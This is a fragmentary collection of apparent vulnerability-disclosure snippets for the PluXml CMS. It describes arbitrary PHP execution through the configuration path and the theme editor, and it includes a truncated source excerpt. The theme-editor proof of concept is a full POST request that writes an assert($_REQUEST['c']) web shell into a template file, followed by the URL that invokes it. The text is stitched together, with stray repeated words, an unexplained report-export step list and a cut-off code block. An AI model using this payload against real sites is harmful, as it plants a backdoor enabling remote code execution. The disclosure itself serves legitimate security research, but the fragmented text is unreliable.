hule
hule
Payload: 1.user 'test' submit a report  2admin export report  3.open the report 
class.plx.admin.php in PluXml allows attackers to execute arbitrary PHP code by modify the configuration file. Source /PluXml/core/lib/class.plx.admin.php line 129~140: ``` if(isset($content['config_path'])) { $newpath=trim($content['config_path']); if($newpath!=PLX_CONFIG_PATH) { # relocalisation du dossier de...
The theme edit function /PluXml/core/admin/parametres_edittpl.php allows remote attackers to execute arbitrary PHP code by placing this code into a template. Poc: `/PluXml/core/admin/parametres_edittpl.php [POST]token=603b37bed4a91d8b18a3507c46ae27df644a2ff4&template=%2Ftags.php&submit=Save+the+file&tpl=%2Ftags.php&content=%3C%3Fphp+assert%28%24_REQUEST%5B%27c%27%5D%29%3B%3F%3E%0D%0A`  `then visit /PluXml/themes/defaut/tags.php?c=phpinfo();` 